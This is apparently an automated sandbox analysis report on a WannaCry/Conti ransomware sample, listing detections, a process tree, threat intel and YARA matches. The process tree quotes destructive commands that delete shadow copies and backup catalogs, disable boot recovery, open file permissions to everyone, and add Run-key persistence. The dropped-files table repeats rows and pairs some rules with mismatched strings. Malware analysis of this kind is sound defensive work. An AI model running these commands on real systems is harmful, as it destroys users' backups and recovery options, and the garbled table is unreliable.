Edit tour

Windows Analysis Report
LisectAVT_2403002A_126.EXE.exe

Overview

General Information

Sample name:	LisectAVT_2403002A_126.EXE.exe
Analysis ID:	1482512
MD5:	c98e7230adb1ba8d2f2082ca885068bb
SHA1:	523a6fdf84bc1b0eec54d9532b3dbe564f29af38
SHA256:	6cf41e72620cafb1577415d626dbb66c8c796d7167164ca091a27c4273378a20
Infos:

Detection

Wannacry, Conti

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Wannacry Ransomware

Malicious sample detected (through community Yara rule)

Sigma detected: Delete shadow copy via WMIC

Yara detected Conti ransomware

Yara detected Wannacry ransomware

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Command shell drops VBS files

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Creates files in the recycle bin to hide itself

Deletes shadow drive data (may be related to ransomware)

Drops PE files to the document folder of the user

Found Tor onion address

Machine Learning detection for dropped file

Machine Learning detection for sample

May use the Tor software to hide its network traffic

Modifies existing user documents (likely ransomware behavior)

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Uses bcdedit to modify the Windows boot settings

Writes many files with high entropy

Writes to foreign memory regions

Abnormal high CPU Usage

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Startup Folder File Write

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara signature match

Classification

Process Tree

System is w10x64native

LisectAVT_2403002A_126.EXE.exe (PID: 9188 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe" MD5: C98E7230ADB1BA8D2F2082CA885068BB)

attrib.exe (PID: 8588 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)

conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

icacls.exe (PID: 7604 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)

conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

taskdl.exe (PID: 7612 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cmd.exe (PID: 8744 cmdline: C:\Windows\system32\cmd.exe /c 109861721946031.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cscript.exe (PID: 8076 cmdline: cscript.exe //nologo m.vbs MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)

dllhost.exe (PID: 8744 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

taskdl.exe (PID: 9280 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 10204 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 10088 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

@WanaDecryptor@.exe (PID: 5284 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)

taskhsvc.exe (PID: 3176 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)

conhost.exe (PID: 2712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8172 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

@WanaDecryptor@.exe (PID: 4800 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)

cmd.exe (PID: 8684 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WMIC.exe (PID: 8804 cmdline: wmic shadowcopy delete MD5: 82BB8430531876FBF5266E53460A393E)

taskse.exe (PID: 9140 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)

@WanaDecryptor@.exe (PID: 9144 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)

cmd.exe (PID: 9200 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "njyalyugfohc920" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 9196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

reg.exe (PID: 8824 cmdline: MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

taskdl.exe (PID: 9824 cmdline: MD5: 4FEF5E34143E646DBF9907C4374276F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Name	Description	Attribution	Blogpost URLs	Link
Conti, Conti Lock	Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.	No Attribution	http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/ https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74 https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/	https://malpedia.caad.fkie.fraunhofer.de/details/win.conti

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
LisectAVT_2403002A_126.EXE.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
LisectAVT_2403002A_126.EXE.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
LisectAVT_2403002A_126.EXE.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
LisectAVT_2403002A_126.EXE.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x27c:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
